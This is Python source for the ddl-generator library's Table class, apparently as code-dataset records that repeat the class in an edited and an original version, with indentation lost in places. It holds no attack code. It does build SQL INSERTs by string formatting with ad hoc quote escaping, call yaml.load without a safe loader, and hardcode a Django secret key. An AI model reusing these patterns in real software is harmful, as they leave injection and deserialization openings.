# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
    """Return this table's column metadata as plain data fit for YAML
    dumping, with child tables nested under their names."""
    # NOTE(review): copy.copy is shallow, so the pop below also mutates the
    # live value dicts in self.columns -- presumably safe because the
    # sa.Table has already been built by the time this runs; confirm.
    result = copy.copy(self.columns)
    for v in result.values():
        v.pop('satype') # yaml chokes on sqla classes
    for (child_name, child) in self.children.items():
        result[child_name] = child._saveable_metadata()
    return result
def _dialect(self, dialect):
    """Resolve and validate a SQL dialect name.

    Falls back to ``self.default_dialect``.  Raises KeyError when neither
    is given, NotImplementedError for an unrecognized dialect.
    """
    if not dialect and not self.default_dialect:
        raise KeyError("No SQL dialect specified")
    dialect = dialect or self.default_dialect
    # Valid dialects are exactly those with a mock engine prepared at
    # module load time.
    if dialect not in mock_engines:
        raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
    return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
# Wraps column commentary as "-- " SQL comment lines for the DDL output.
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
    """Return the SQL that defines this table and, recursively, its children.

    ``drops`` / ``creates`` control whether DROP and CREATE statements are
    emitted; child tables are rendered with the same flags and dialect.
    """
    dialect = self._dialect(dialect)
    compiled = str(CreateTable(self.table).compile(mock_engines[dialect]))
    # drop the blank lines the compiler leaves in the CREATE statement
    creator = "\n".join(line for line in compiled.splitlines() if line.strip())
    comments = "\n\n".join(
        self._comment_wrapper.fill("in %s: %s" % (col, self.comments[col]))
        for col in self.comments)
    pieces = []
    if drops:
        pieces.append(self._dropper(dialect) + ';')
    if creates:
        pieces.append("%s;\n%s" % (creator, comments))
    pieces.extend(child.ddl(dialect=dialect, creates=creates, drops=drops)
                  for child in self.children.values())
    return '\n\n'.join(pieces)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
    """Dumps Python code to set up the table's SQLAlchemy model"""
    # Start from repr() of the sa.Table and strip the ", table=<...>"
    # backrefs repr() attaches to each Column.
    table_def = self.table_backref_remover.sub('', self.table.__repr__())
    # inject UNIQUE constraints into table definition
    constraint_defs = []
    for constraint in self.table.constraints:
        if isinstance(constraint, sa.sql.schema.UniqueConstraint):
            col_list = ', '.join("'%s'" % c.name
                                 for c in constraint.columns)
            constraint_defs.append('UniqueConstraint(%s)' % col_list)
    if constraint_defs:
        constraint_defs = ',\n '.join(constraint_defs) + ','
        # splice the constraints in just before the trailing schema= kwarg
        table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
    # repr() binds to a throwaway MetaData; point the output at the
    # ``metadata`` object created by the generated script's preamble
    table_def = table_def.replace("MetaData(bind=None)", "metadata")
    # cosmetic line breaks so each Column/schema kwarg reads on its own line
    table_def = table_def.replace("Column(", "\n Column(")
    table_def = table_def.replace("schema=", "\n schema=")
    result = [table_def, ]
    # child tables are appended as further assignments, without the preamble
    result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
    result = "\n%s = %s" % (self.table_name, "\n".join(result))
    if is_top:
        # import only the SQLAlchemy names the generated code actually uses
        sqla_imports = set(self.capitalized_words.findall(table_def))
        sqla_imports &= set(dir(sa))
        sqla_imports = sorted(sqla_imports)
        result = self.sqlalchemy_setup_template % (
            ", ".join(sqla_imports), result, self.table.name)
        result = textwrap.dedent(result)
    return result
def django_models(self, metadata_source=None):
    """Print Django model definitions inferred from this table.

    Builds the table in a throwaway SQLite database file, then runs
    Django's ``inspectdb`` management command against it and deletes the
    file.  Requires Django to be importable; otherwise a message is
    printed and nothing else happens.
    """
    sql = self.sql(dialect='postgresql', inserts=False, creates=True,
                   drops=True, metadata_source=metadata_source)
    statements = sql.split(';\n')
    try:
        import django
    except ImportError:
        print('Cannot find Django on the current path. Is it installed?')
        django = None
    if django:
        from django.conf import settings
        from django.core import management
        import sqlite3
        import os
        db_filename = 'generated_db.db'
        conn = sqlite3.connect(db_filename)
        try:
            cursor = conn.cursor()
            for statement in statements:
                # skip whitespace-only fragments left over by the split
                if statement.strip():
                    cursor.execute(statement)
            # Commit so inspectdb's *own* connection sees the schema, and
            # close so the file can be removed afterwards — the original
            # left the transaction open and the handle dangling.
            conn.commit()
        finally:
            conn.close()
        if not settings.configured:
            settings.configure(
                DEBUG='on',
                SECRET_KEY='1234',
                ALLOWED_HOSTS='localhost',
                DATABASES={'default': {'NAME': db_filename,
                                       'ENGINE': 'django.db.backends.sqlite3'}},
            )
        django.setup()
        management.call_command('inspectdb', interactive=False)
        os.remove(db_filename)
# Per-dialect strftime formats for date/time literals; empty means every
# dialect falls back to the quoted ISO default in _prep_datum.
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
# str.format template used by inserts() for one row's INSERT statement.
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
    """Yield ALTER SEQUENCE statements matching the source database.

    Set database sequence objects to match the source db.
    Relevant only when generated from SQLAlchemy connection.
    Needed to avoid subsequent unique key violations after DB build.
    """
    # The catalog query below is PostgreSQL-specific (pg_namespace /
    # pg_class); other RDBMS are not implemented.  The original tested
    # ``!= 'postgresql'``, which ran the PG query against every *other*
    # engine instead.
    if self.source.db_engine and self.source.db_engine.name == 'postgresql':
        conn = self.source.db_engine.connect()
        try:
            qry = """SELECT n.nspname || '.' || c.relname
                     FROM pg_namespace n
                     JOIN pg_class c ON (n.oid = c.relnamespace)
                     WHERE c.relkind = 'S'"""
            for (seq_name, ) in list(conn.execute(qry)):
                (lastval, ) = conn.execute(
                    "SELECT last_value FROM %s" % seq_name).first()
                # The original formatted two %s placeholders with a single
                # value — a TypeError at runtime that also dropped the
                # sequence name.
                yield "ALTER SEQUENCE %s RESTART WITH %s;" % (
                    seq_name, int(lastval) + 1)
        finally:
            conn.close()  # original leaked the connection
def inserts(self, dialect=None):
    """Generate INSERT statements (or SQLAlchemy inserter source) for the data.

    For the ``sqlalchemy`` pseudo-dialect, yields lines of Python source
    defining an ``insert_<table>`` function; for real SQL dialects, yields
    one INSERT statement per row.  Child tables' inserts are yielded
    afterwards with the same dialect.
    """
    if dialect and dialect.startswith("sqla"):
        if self.data:
            yield "\ndef insert_%s(tbl, conn):" % self.table_name
            yield " inserter = tbl.insert()"
            for row in self.data:
                yield textwrap.indent("conn.execute(inserter, **{row})"
                                      .format(row=str(dict(row))),
                                      " ")
            for seq_updater in self.emit_db_sequence_updates():
                yield ' conn.execute("%s")' % seq_updater
            # TODO: no - not here
        else:
            yield "\n# No data for %s" % self.table.name
    else:
        dialect = self._dialect(dialect)
        # rows from a SQLAlchemy source arrive already typed; anything else
        # (CSV, YAML, JSON, ...) needs string-to-Python conversion first
        needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
        for row in self.data:
            cols = ", ".join(c for c in row.keys())
            vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
                             for (key, val) in row.items())
            yield self._insert_template.format(table_name=self.table_name,
                                               cols=cols, vals=vals)
    # recurse into child tables regardless of dialect branch
    for child in self.children.values():
        for row in child.inserts(dialect):
            yield row
def sql(self, dialect=None, inserts=False, creates=True,
        drops=True, metadata_source=None):
    """
    Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
    ``.inserts(dialect)``.
    """
    pieces = [self.ddl(dialect, creates=creates, drops=drops)]
    if inserts:
        pieces.extend(self.inserts(dialect))
    return '\n'.join(pieces)
def __str__(self):
    """Render as DDL when a default dialect is set; otherwise fall back to repr."""
    return self.ddl() if self.default_dialect else self.__repr__()
def _fill_metadata_from_sample(self, col):
    """Derive ``pytype`` and a SQLAlchemy type for one column dict, in place.

    ``col`` must carry ``sample_datum`` (the best representative value seen
    so far) and, for strings, ``str_length``.  ``data_size_cushion`` pads
    the derived sizes so slightly larger future data still fits.
    """
    col['pytype'] = type(col['sample_datum'])
    if isinstance(col['sample_datum'], Decimal):
        (precision, scale) = th.precision_and_scale(col['sample_datum'])
        # pad precision/scale so rows with a few more digits still fit
        col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
                                   scale + self.data_size_cushion)
    elif isinstance(col['sample_datum'], str):
        if self.varying_length_text:
            col['satype'] = sa.Text()
        else:
            str_len = max(len(col['sample_datum']), col['str_length'])
            col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
    else:
        col['satype'] = self.types2sa[type(col['sample_datum'])]
        # promote to BIGINT when the sample is near the 32-bit limit
        # (the cushion shrinks the threshold accordingly)
        if col['satype'] == sa.Integer and (
                col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
                col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
            col['satype'] = sa.BigInteger
    return col
# Fallback Python-type -> SQLAlchemy-type map for samples that are neither
# Decimal nor str (those get sized types in _fill_metadata_from_sample).
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
            float: sa.Numeric, bool: sa.Boolean,
            type(None): sa.Text}
def _determine_types(self):
    """Infer per-column metadata (sample value, nullability, uniqueness) from the data.

    Fast path: a SQLAlchemy-backed source already describes its columns,
    so they are copied straight across.  Otherwise every row is scanned,
    accumulating a best representative sample, the maximum string length,
    nullability, and a uniqueness check per column; the samples are then
    converted to SQLAlchemy types via ``_fill_metadata_from_sample``.
    """
    column_data = OrderedDict()  # NOTE(review): appears unused — candidate for removal
    self.columns = OrderedDict()
    if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
        # source is a SQLAlchemy reflection; trust its column definitions
        for col in self.data.generator.sqla_columns:
            self.columns[col.name] = {'is_nullable': col.nullable,
                                      'is_unique': col.unique,
                                      'satype': col.type,
                                      'pytype': col.pytype}
        return
    self.comments = {}
    rowcount = 0
    for row in self.data:
        rowcount += 1
        keys = row.keys()
        # a column seen in earlier rows but absent here must be nullable
        for col_name in self.columns:
            if col_name not in keys:
                self.columns[col_name]['is_nullable'] = True
        if not isinstance(row, OrderedDict):
            keys = sorted(keys)  # deterministic order for unordered rows
        for k in keys:
            v_raw = row[k]
            if not th.is_scalar(v_raw):
                # nested (non-scalar) value: record an example as a comment
                # NOTE(review): this ``v`` is overwritten just below —
                # only the comment/warning uses the stringified form
                v = str(v_raw)
                self.comments[k] = 'nested values! example:\n%s' % \
                    pprint.pformat(v)
                logging.warning('in %s: %s' % (k, self.comments[k]))
            v = th.coerce_to_specific(v_raw)
            if k not in self.columns:
                # first sighting: nullable unless present and non-blank
                # in the very first row
                self.columns[k] = {'sample_datum': v,
                                   'str_length': len(str(v_raw)),
                                   'is_nullable': not (rowcount == 1 and
                                                       v is not None and
                                                       str(v).strip()
                                                       ),
                                   'is_unique': set([v, ])}
            else:
                col = self.columns[k]
                col['str_length'] = max(col['str_length'], len(str(v_raw)))
                old_sample_datum = col.get('sample_datum')
                col['sample_datum'] = th.best_representative(
                    col['sample_datum'], v)
                if (v is None) or (not str(v).strip()):
                    col['is_nullable'] = True
                # is_unique holds the set of values seen so far; it
                # collapses to False at the first duplicate
                if (col['is_unique'] != False):
                    if v in col['is_unique']:
                        col['is_unique'] = False
                    else:
                        col['is_unique'].add(v)
    for col_name in self.columns:
        col = self.columns[col_name]
        self._fill_metadata_from_sample(col)
        col['is_unique'] = bool(col['is_unique'])  # non-empty set -> True
# Boilerplate emitted at the top of generated standalone SQLAlchemy scripts.
sqla_head = """
import datetime
# check for other imports you may need, like your db driver
from sqlalchemy import create_engine, MetaData, ForeignKey
engine = create_engine(r'sqlite:///:memory:')
metadata = MetaData(bind=engine)
conn = engine.connect()"""
def sqla_inserter_call(table_names):
    """Return source for an ``insert_test_rows`` function covering *table_names*.

    The generated function calls each table's ``insert_<name>`` helper in
    order, so the emitted script can populate every table in one call.
    (Fixes the docstring typo "before passing calling this" in the
    generated code.)
    """
    return '''
def insert_test_rows(meta, conn):
    """Calls insert_* functions to create test data.
    Given a SQLAlchemy metadata object ``meta`` and
    a SQLAlchemy connection ``conn``, populate the tables
    in ``meta`` with test data.
    Call ``meta.reflect()`` before calling this."""
    %s
''' % '\n'.join(" insert_%s(meta.tables['%s'], conn)" % (t, t)
                for t in table_names)
# Run this module's doctests when executed directly.
if __name__ == '__main__':
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.ddl | python | def ddl(self, dialect=None, creates=True, drops=True):
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result) | Returns SQL to define the table. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L263-L281 | [
"def _dialect(self, dialect):\n if not dialect and not self.default_dialect:\n raise KeyError(\"No SQL dialect specified\")\n dialect = dialect or self.default_dialect\n if dialect not in mock_engines:\n raise NotImplementedError(\"SQL dialect '%s' unknown\" % dialect)\n return dialect\n",... | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sqlalchemy | python | def sqlalchemy(self, is_top=True):
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
